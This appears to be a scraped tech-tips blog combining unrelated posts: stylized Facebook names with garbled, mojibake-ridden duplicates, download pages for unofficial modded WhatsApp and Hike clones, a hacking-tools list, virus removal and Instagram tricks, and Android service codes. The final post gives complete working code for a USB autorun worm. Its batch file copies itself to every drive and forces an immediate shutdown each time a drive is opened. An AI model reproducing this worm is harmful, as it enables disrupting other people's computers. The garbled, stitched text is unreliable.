Facebook Long Stylish Ghost Name List – [Updated]

img_76638

Hello Friends. I Updated this Facebook Long Stylish and Ghost Names for Our Visitors as many of you requested 🙂 Please share this post to Help us!

Thank you and Enjoy

Mɽ Pèŗfècţ

ち ち

Կշօ Յշօ

유웃

亠 ジ气覀气亠 亠

ΞΔ ΞΔ ΞΔ

լ. վ. Յ.

Girlś-dóor’rāhoɱujhşy Wårŋa-Wo’hāal Króŋga-k’ŋafråtKro-gi’khudşy

Μγ ηαΜε ιξ κΗαη

Ѕвв’ќѻјѧӏѧѧ-ЌѧяЯѧѧќђ’ Ќаяԁцйҩѧ Ғт’ѧј-Мєйтѧӏ

Mʋjhə’Wo-Lɵg Pʌsand’Haıı-Jo Mʋjhe’Pʌsand-Nahıı Kartə

ιηηοχεητ ηαωαβ Ζαδι

Qʋɘɘŋ Oʆ Boɭɗŋɘss ʆt-Dʌƴʌŋ

Mujʜ’Pe-Lɩŋe Nʌ’Mʌʌʀo-Me Pʜʌsuŋʛɩ Nɩ’Loɭx

Ởpeŋ LɩỞŋ-Tʜe’UŋɓeʌtʌɓLe FɩʛʜTệʀ’Ởŋ-Fɩɽe

Têrî Gf Mêrî Fâñ

Ħum’shaɽeef-kyaHuwe’pooɽıı-duŋiya hıı’Badmash-ħogayıı Ft-Dãñgër

Həăřţ Hąčķəř

Pāgłi-Styłe’Đękh Kâr’ßehoşh-ĦoGâi Sɱile-Đuŋga’TohMar’Ħii-Jayęgi

Naam’bata-diya To’pechan-Bura Maan’jayegi

Twıŋkle-TwıŋkleLittle-star’HotChori-ıŋ’ɱy Car

Sţŷlįşħ GłøŠśŷ Þríŋćęss

Śháràbì Vʌɱpɩʀɘ

ლლ

μηκηοωη βογ

Маіи-јав’идѕнє-мє Ђотд-нци-тавђі’то Ђ

Błøck’KąrDę-MujhkøWąrŋąPyąr-HøJąÿegą-Tųjhkø

Рэяғэст Ѕмөкэя

Mʌii’DikhtaHuŋ-Sweet Innocent’Swamii-TypeKaLekiŋ’Hu-Bara Harʌmii’Type-Ka

Intérnátiønål Smøkér ßøý

τΗε βεξτ εδιτοπ

Ąloŋə Iıŋ Mılıoŋs

Prïñçē Of-Yøür Hęårt 35: Ғдмоцѕ Вѧснд Ғдмоцѕ Вѧснi

Дттїтцԁү ряїисє

ғдсєвөөк ряїисєѕѕ (G)

ѕмдят вөү39: Yoʋr-ʌttitudɘ Is-ɗust’of My-foot

Lıỡŋ-tħe’UŋbeʌtʌbleFııghtệʀ-ỡŋ’Fııre

Flîŗty Kııŋg-Retʋrns Jʋśt-TóLóvē’Yóu-āgaîn

Jo-keĥte’he ɱe-bap’ĥuŋ ɱe-usk’bap ka-bhıbapĥuŋ 43: ßəʌʋtɣ Qʋɘɘŋ (G)

ʆʌcɘɓooĸ ĸı Stƴɭɩsʜ ɭʌdĸı (G)46:Kämèèña Ft Jäñğra

Chåɽɱıng Pẘīŋcē

Iŋtɘɽŋʌstiỡŋʌl Áʌwʌɽʌ Loŋđʌ Ft-þrîñçè

Maıŋ’Teʀi-Girlfʀieŋd Ka-Yaaʀ’Teʀi Giʀlfrieŋd’Męra-Pyarʚ’Ŋuaghty-ʚ

Tęrȋ’gf ɱërȋ-fån Lę-

Čřąçk Pąthąń

Kaɱiŋa SK

Bêtâ-Issây’Kêhtê Hʌı-HîpHôp-Hîp’hôp

Mııthe’yaŋ-Gʌllʌ KaʀeKudıı’Naɱkeeŋ Ft-Anıhʌ (G) metthia galla kera kurenamkin

Fʌsʜioŋʌbɭe Stʀʌwɓɘrry Ft-Aɩsʜʌ (G)

Fʌdebʌʌz Mʌd FʌmouxChokrʌ

Evįl-SmøkÊr THë’BÂd-DrúnkÊrFT-EmôTîôn’LeSs

Ηεαπτ βπεακεπ (G)

ŠîŁêñt Kïłlêr

Naaɱ’hɘro-ĸaʌ Kaaɱ’viɭleŋ-kaʌFt’smoker 61:Sād Gıŕl Ft-vþ Prıncəss

Gıŗlfrŋd To’bachyBhi-baŋAtyHaıŋKàmıŋa HuKamıŋi’hı-FasauŋGa

Pãnğèßâzz Chôkrà

Çütéxx Prïnçèzz (G) 65:IñnÖcent ßaChi Ôn Fìrê (G)

TʌBʌhı Khʌn Namə-toSʋŋa’Hogʌ

Fııghtệʀ’ʑ kʌ Bʌp Ft-Cʜʋĸʀʌ

Dʋnıa-Mʌı’SırfDo ChezHe-MashurHʌı’Ek SʌMʌʌK-kʌStyle’Dʋsrʌ Uskı-

GrlfrendKı’Sɱılə

Vɘɱpɩʀɘ Gɩʀɭ Rɘtʋʀŋ (G)

Isʜʌq ʑʌʌdʌ71:Mɽ Hʋŋteɽ

Bʌby Pasʌnd-aye’to Dıl-ɱə’waɽŋa Dəɱagh-ɱəbi’ŋi 73:

Dʌŋgeroʋs Ħāçkêɽ

Ŋākçhaʀî Bîgŗî Ŋāwāɓzadî(G)

Kısı-k Ħatħ’Na Áygi Yêħ-łádkii

ĂweşŐmelįciőux Çhūlbülíí Çhøkrî(G)

MIIƦɅSS KʜɅɳ

կ. ձ. օ.

Mɽ Pèŗfècţ

知々夫国造

Kšō Yšō

tóu ji gas gas tóu tóu xī

Xd Xd Xd

լ. վ. յ.

Girlś-dóor’rāhoɱujhşy Wårŋa-Wo’hāal Króŋga-k’ŋafråtKro-gi’khudşy
zq ēame kēaē lx
Dzvv ‘ Ḱѻjѧӏѧѧ-Ḱѧââѧѧḱđ ‘ ḱaâԁcjҩѧ ġt ‘ Ѧj-mêjtѧӏ
Mʋjhə’Wo-Lɵg Pʌsand’Haıı-Jo Mʋjhe’Pʌsand-Nahıı Kartə

iēēocheēt ēaōab zadi

Qʋɘɘŋ Oʆ Boɭɗŋɘss ʆt-dʌƴʌŋ

Mujʜ’Pe-Lɩŋe Nʌ’Mʌʌʀo-Me Pʜʌsuŋʛɩ Nɩ’Loɭx

Ởpeŋ Lɩởŋ-Tʜe ‘uŋɓeʌtʌɓle fɩʛʜtệʀ’ Ởŋ-fɩɽe

Têrî Gf Mêrî Fâñ

Ħum ‘ Shaɽeef-Kyahuwe ‘ Pooɽıı-Duŋiya huh ‘ Badmash-Ħogayıı ft-dãñgër

həăřţ hąčķəř

Pāgłi-Styłe ‘ Đękh profit in ßehoşh-Ħogâi Sɱile-Đuŋga ‘ Tohmar Ħii-Jayęgi ‘

Naam’bata-diya To’pechan-Bura Maan’jayegi

Twıŋkle-TwıŋkleLittle-star’HotChori-ıŋ’ɱy Car

Sţŷlįşħ GłøŠśŷ Þríŋćęss

śháràbì vʌɱpɩʀɘ

ლლ

mēkēoōē bog

Маіи-јав’идѕнє-мє Ђотд-нци-тавђі’то Ђ

Błøck’KąrDę-MujhkøWąrŋąPyąr-HøJąÿegą-Tųjhkø

Рэяғэст Ѕмөкэя

Mʌii’DikhtaHuŋ-Sweet Innocent’Lekiŋ’Hu-Bara Harʌmii’Type-Ka

Care of urn iø smø l want text ßøý

ąloŋə iıŋ mılıoŋs

Prïñçē Of-Yøür Hęårt 35: Ғдмоцѕ Вѧснд Ғдмоцѕ Вѧснi

Ġdsyevөөk Ryayiysyeẑẑ

ѕмдят вөү

Yoʋr-ʌttitudɘ Is-ɗust’of My-foot

Lıỡŋ-Tħe ‘Uŋbeʌtʌblefııghtệʀ-Ỡŋ’ fııre

Flîŗty Kııŋg-Retʋrns Jʋśt-Tólóvē ‘ Yóu-āgaîn

Jo-keĥte’he ɱe-bap’ĥuŋ

Download GBWHATSAPP v5.15 (Dual WhatsApp In 1 Phone)

screenshot_2016-12-13-09-18-45

CHANGE LOG IN V5.15

[Fixed] Alert that the program is Harmful

(if not fixed please uninstall app and install again)

[Fixed] disable custom Calls
[Fixed] option to create Shortcut
[Fixed] Showing old pic profile
[Fixed] crash when open app
[Fixed] crash when open chat
[Fixed] crash when hide last seen from widget
[Fixed] Messages Translation
Other Fixes.

CHANGE LOG IN V5.10

[ New ] Base Updated to 2.16.352
[ Exclusive ] Elapsed Time instead of Last Seen on Main Screen (Mod 2.2.2c) (use 24hr time format)
[ Exclusive ] Option to make normal call from inapp instead of WhatsApp call
[ Added ] New Emojis (send Big Emojis)
[ Added ] Option to increase the limit to send audio (Mod 5.3)
[ Added ] Doodle (Now add edit pics with emojis & text)
[ Added ] Farsi Language Translation
[ Added ] Option to change color of Group name while Forwarding a msg (Mod 2.4.14)
[ Added ] Option to change Background of Emoji in Pop-up Notification (Mod 3.14)
[ Added ] Option to set duration for Online Toast (Mod 2.5.4)
[ Fixed ] WhatsApp.Log
[ Fixed ] Return to Default wall when use mod 1.2.0
[ Fixed ] GB Widget
Other Stability Fixes.

WhatsApp+ & GBWhatsApp Features

🔹 Based on 2.16.352
🔹 Ban proof
🔹 supports calls
🔹 hide your ( last seen )
🔹 privacy mods
🔹 themes mods
🔹 Theme Server ( to download/apply themes )
🔹 Change ticks/bubbles Style Mod
🔹 (17) Ticks & (13) Bubbles Styles to choose
🔹 counter statistics for groups
🔹 media preview without loading
🔹 Show Online/last Seen in Main Screen
🔹 send video with size 30MB instead of 16MB
🔹 send 90 images at once instead of 10
🔹 change your status and add to 250 characters instead of 139 characters
🔹ability to press on links on chat screen without save sender number or group          admin number
🔹 ability to press in links on your friends’ status
🔹 ability to distinguish between normal messages and Broadcast messages
🔹 hide the name and the date when copy more than one message
🔹 ability to copy friends’ status
🔹 ability to change the app icon and notifications
🔹 and many many other features .. discover it by yourself ..

NOTES

– If Anyone face any Crash please clear your theme & Logs.
– Telegram links will not be clickable in media caption due some problems
– Adding FAB in Contacts & Calls Screen was stopped as there is already Search button available in both screens … Sorry

images

 

>> GBWhatsApp–>>GBWhatsapp

FMWhatsApp v4.05 Extended

🔰FMWhatsApp v4.05 Extended IOS 9.1 emoj
🔰Based on GBWA

🔸FMWHatsApp com.fmwhatsapp

Screenshot_2016-03-07-12-26-58

🔹 What s New🔹

🔹Added conversations style entry WAMA style, Hangout style
🔹Show contacts name in whatsapp.logs instead of numbers
🔹Added MOD 6.14 to stop receiving WhatsApp Voice Calls
🔹Change color of emojis icons in Emoji bar in Conversation Screen when use MOD 1.2.26
🔹Use MOD 6.8 to also delete cache ( Cache & Unnecessary files )
🔹Size 18 mb only
🔹Other fixes

🔹Added more 6 bubbles
>Telegram >Windows Phone >In >Bryed >Alternate Crayon v2 >Fold
Thus total number of bubbles = 30(6+4+3+2+9+6)
🔹Added more 7 ticks
>Google v1 >Material v2 >GRW >Feet >Crayon Alternate v2 >Heart >Android
Thus total number of ticks = 37(9+7+2+1+3+8+7)
🔹Fixed WA+ Paper Redesigned (now looks more like Wa+ Paper)
🔹Fixed Material v1 ticks (easy to distinguish between sent and delivered)
🔹Fixed WALB and Chat On bubbles (small fix at edges)
🔹Fixed FB messenger tick (sent tick)
🔹Changed design of Google ticks and added as Google v1
🔹Say goodbye to LAG. Fixed lag issue radically .. No more lags – Super fast !

👇Download Link 👇

🔹FMWhatsApp 4.0 com.fmwhatsapp

👉👉👉👉Click Here👈👈👈👈

New Best Hacking Tools list of 2016

Hello Techyved visitors. Today I am talking about best hacking tools.
Hacking always involves tools. A good hacker knows how to use his tools to best advantage. An even better hacker writes his own tools. Here I have listed the top 10 most popular tools used in hacking. It is advisable to master these tools to become a good hacker. Concise Courses conducted an online poll to determine the top ten Best Hacking Tools of 2016 out of some of the famous ones.

images5

Here is the top 10 list Best Hacking Tools, which came out the winner on the poll :-

1) Nmap:

Nmap is an abbreviation of ‘Network Mapper’. Nmap is a very popular hacking tool that was originally created to act as a method of being able to scan large networks, but it works absolutely fine for single hosts (targets). Nmap works on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. Nmap was traditionally a command-line tool, but there is a GUI available called ‘Zenmap’. Many system admins use Nmap for network inventory, open ports, managing service upgrade schedules, and monitoring host or service uptime. The tool uses raw IP packets in creative ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions and possible patches) and what type and version of packet filters/ firewalls are being used by the target.

2) The Metasploit Project:

The Metasploit Project is a widely used and extremely popular cyber security project that allows a penetration tester (or hacker) the ability to seek security vulnerabilities within networks and machines and is able to help audit systems. In addition, Metasploit also accommodates the efficient management and testing of Intrusion Detection Systems. The most popular ‘division’ of this ‘multi-purpose hacking tool’ is the open source Metasploit Framework Project, commonly referred to as simply ‘Metasploit’. This tool helps the user develop and execute (known or otherwise) exploit code against a remote target machine. Many Metasploit users use the tool for anti-forensic and evasion purposes, many of which are built into the Metasploit Framework.

3) Cain & Abel:

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.

4) Angry IP scanner:

Angry IP scanner is a very fast IP address and port scanner. It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere. Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathering data about each host can be extended with plugins. It also has additional features, like NetBIOS information (computer name, Workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc. Scanning results can be saved to CSV, TXT, XML or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs. ody who can write Java code is able to write plugins and extend functionality of Angry IP Scanner. In order to increase scanning speed, it uses multi threaded approach: a separate scanning thread is created for each scanned IP address.

5) John the Ripper:

John the Ripper is a free password cracking software tool. John the Ripper is often used in the enterprise to detect weak passwords that could put network security at risk, as well as other administrative purposes. The software can run a wide variety of password-cracking techniques against the various user accounts on each operating system and can be scripted to run locally or remotely. Originally developed for Unix-derived systems, John the Ripper is available for most common platforms. The free and open source (FOSS) version is generally distributed as source code. A commercial version, John the Ripper Pro, is a more user-friendly version distributed as native code for a given system.

6) THC Hydra:

THC Hydra is a fast and flexible Network Login Hacking Tool. It uses a dictionary attack to try various password/login combinations against an Internet service to determine a valid set of login credentials. This hacking tool supports a wide set of protocols including Mail (POP3, IMAP, etc.), Databases, LDAP(Lightweight Directory Access Protocol), SMB, VNC, and SSH (Secure Shell, used by VPN Softwares).

7) Burp Suite:

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

8) Nessus:

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network. It does this by running over 1200 checks on a given computer, testing to see if any of these attacks could be used to break into the computer or otherwise harm it. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

9) Ettercap:

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. Once successful Ettercap (and the hacker) can deploy various attacks on the victim. A popular feature about Ettercap is its’ ability to support various plugins.

10) Wapiti:

Wapiti is able to scan and detect hundreds of possible vulnerabilities. Essentially, this Multi-Purpose Hacker Tools can audit the security of web applications by performing “black-box” scans, i.e. It does not study the source code of the application but will scan the HTML pages of the application seeking scripts and forms where it can inject data.

WhatsApp Update Allows to Send Documents on WhatsApp.

WhatsApp is not just an instant messenger, but it allows us to do a lot of tasks such as sending images, sending voice clips, sending videos and sending music. A lot of people still desire to send documents using WhatsApp and there were a lot of techniques (not official) which enabled people to send documents using WhatsApp.

Recently WhatsApp has released an update which allows people to send documents using WhatsApp. Yes, you read it right, you can now send documents using your WhatsApp. For the time being you will just be able to send PDF documents using WhatsApp.

Here are the screenshots showing the official WhatsApp Update :-

whatsapp-update-4whatsapp-update-2

Don’t feel sad if you haven’t received the WhatsApp Document update yet, because like always WhatsApp releases updates in the form of batches.
The WhatsApp Documents option comes with the WhatsApp build number 2.12.493, if you haven’t received the update then you can

USE 2 HIKE ON ONE DEVICE FIRST ON NET

Hello Friends i m back with new trick.
Today i am posting how to use 2 Hike app on one mobile device.
Hope u like ..!!
Screenshot

Screenshot_2016-02-07-11-58-45

1) Download original Hike app form play store
2) verifying your 1st number
3) Download 2nd Hike app form below the Link
4) then verifying your 2nd number
5) enjoying 2 Hike on one device.

Moded Hike app download
Hike Blue(Default) With Changed Package – Click Download Link Below

Download

Keep visiting and sharing aslo..!! 🙂

How to remove shortcut Trojan/Virus from USB/Hard Drives?

virus-removal13
Today we are going to tell you an easy technique for removing the inborn shortcut Trojan/Virus from your hard drives, USB Drives, Memory Cards and/or other
storage devices.

USB drives specially those which were partially used on shared computers or laptops at schools, internet cafe, hotels, etc are highly susceptible to contamination by viruses present on other devices. The most common and undergoing Virus is shortcut virus that initially creates many undesirable icons on the device. The hidden files/folders in these shortcuts really matters, as this is what you had stored on that USB/Hard drive and virus are preventing access to them.

Shortcut virus usually creates the shortcut of files and/or folders. So if you see such shortcut files in Computer or Pen drive then it is the sure signs that your computer or pen drive contains the stubborn shortcut virus. This is a kind of virus which will not be detected by normal antivirus.

Below are the simple tricks which helps you remove the shortcut Trojan/virus from the contaminated computer or USB/Hard drives. We can remove these shortcut virus easily by using the simple functionality of command prompt.

Follow these simple steps accordingly

Step 1. Open Command Prompt (CMD)
a. Press “Windows Logo Key + R” opens up Run dialogue box.
b. Type “CMD” and press enter.

2
Step 2. After opening command prompt type the following command
attrib :*.* /d /s -h -r -s

* Note:- – Refers the drive containing virus or shortcuts.
* If USB/Hard drive that contain Shortcuts is A-Drive, we needs to use the command like
attrib a:*.* /d /s -h -r -s

3
Step 3. Wait for sometime till the time above Command finishes the process. Upon successful completion all the shortcuts Trojan/virus would be removed from the USB/Hard drive.

Step 4. Above process will convert all shortcut files into normal files/folders or in some cases these may be completed removed from the disk drive. In case these hidden shortcuts does not converted into normal files/folders, then delete the undesired files manually from the storage drive but only and only after command process completes. We highly recommend that after removing shortcuts virus, copy the USB data to another disk drive or volume.

Step 5. Once completed, Format the USB/Hard drive and copy/move the data back into drive.

Enjoy!!!
•••••••••••••••••••••••••••••••••••••••••••
Thanks for Reading.This simple Tutorial. It is very helpful for window user…..

Get Auto Followers On Instagram [Safest Method]

Hey folks so now a days most of peoples are using instagram now a days so today TechyVed is back with the trick in which u can easily get auto followers on instagram this trick is safe it is not about the auto followers or anything there is a page on instagram in which u have to follow some peoples which are followed by that page and you have to wait for sometime.You will get followers easily what u need is instagram this trick is working great but what u need is patients

This trick is safe it wont block your instagram or anything

Lets come to the trick of auto followers

1. Install the Instagram From Google Play Store

2. Open the instagram and Login/ Sign up with new account

3. Now just search POPUGRAM and open the page

4. Now you will see a page just
follow them

Screenshot_2016-01-31-13-07-22
5. Just follow the list which they are following them

6. Now wait for sometimes and you will see your followers incresing

7. Those who are following you follow them too so that you wont loose your followers

8. You can easily get 1000 followers in a day easily by this page

I am not promoting the above page i am just giving you trick about how it actually work stay tuned and repeat the process again and again

Vedant Bansal

Android Mobile useful codes

1. Phone Information, Usage and Battery – *#*#4636#*#*

2. IMEI Number – *#06#

3. Enter Service Menu On Newer Phones – *#0*#

4. Detailed Camera Information –*#*#34971539#*#*

5. Backup All Media Files –*#*#273282*255*663282*#*#*

6. Wireless LAN Test –*#*#232339#*#*

7. Enable Test Mode for Service –*#*#197328640#*#*

8. Back-light Test – *#*#0842#*#*

9. Test the Touchscreen –*#*#2664#*#*

10. Vibration Test –*#*#0842#*#*

11. FTA Software Version –*#*#1111#*#*

12. Complete Software and Hardware Info –*#12580*369#

13. Diagnostic Configuration –*#9090#

14. USB Logging Control –*#872564#

15. System Dump Mode –*#9900#

16. HSDPA/HSUPA Control Menu –*#301279#

17. View Phone Lock Status –*#7465625#

18. Reset the Data Partition to Factory State – *#*#7780#*#*

Vedant Bansal

Create Your own Pendrive virus

鈥⑩€ 鈭�
You can make your own pen-drive virus. This is a simple virus
created in MS-DOS. This virus saves in your pen drive. The
system will shutdown when you open the pen drive. And after
the booting, the system shutdowns each and every time when
you open any drive of your system. So take all risks your self. I
am not responsible for any damage to your system.

|鈥⑩€ 鈭�

1. Connect your pen drive first. Open Notepad and type
following:

[autorun]
ShellExecute=mak.bat

|鈥⑩€ 鈭�

2. And save it as “Autorun.inf “. You should give the same
name i.e “Autorun.inf”. (Don鈥檛 use inverted comas)

|鈥⑩€ 鈭�

3. Open another Notepad document and type following:
@echo off
xcopy “Autorun.inf”/H c:
xcopy “Autorun.inf”/H d:
xcopy “Autorun.inf”/H e:
xcopy “Autorun.inf”/H f:
xcopy “mak.bat”/H c:
xcopy “mak.bat”/H d:
xcopy “mak.bat”/H e:
xcopy “mak.bat”/H f:
shutdown -s -f -t 00
( Just Copy Paste above program )

|鈥⑩€ 鈭�

4. Save this file as “mak.bat”.

|鈥⑩€ 鈭�

5. Change the properties of the files in “Hidden“. Copy the
both files(Autorun.inf and mak.bat) in to your pen drive.
Reconnect the pen drive. And open the pen drive. You will see
the system restart.

|鈥⑩€ 鈭� |鈥⑩€ 鈭� |鈥⑩€ 鈭� |鈥⑩€ 鈭� |鈥⑩€ 鈭� |鈥⑩€ 鈭� |鈥⑩€ 鈭�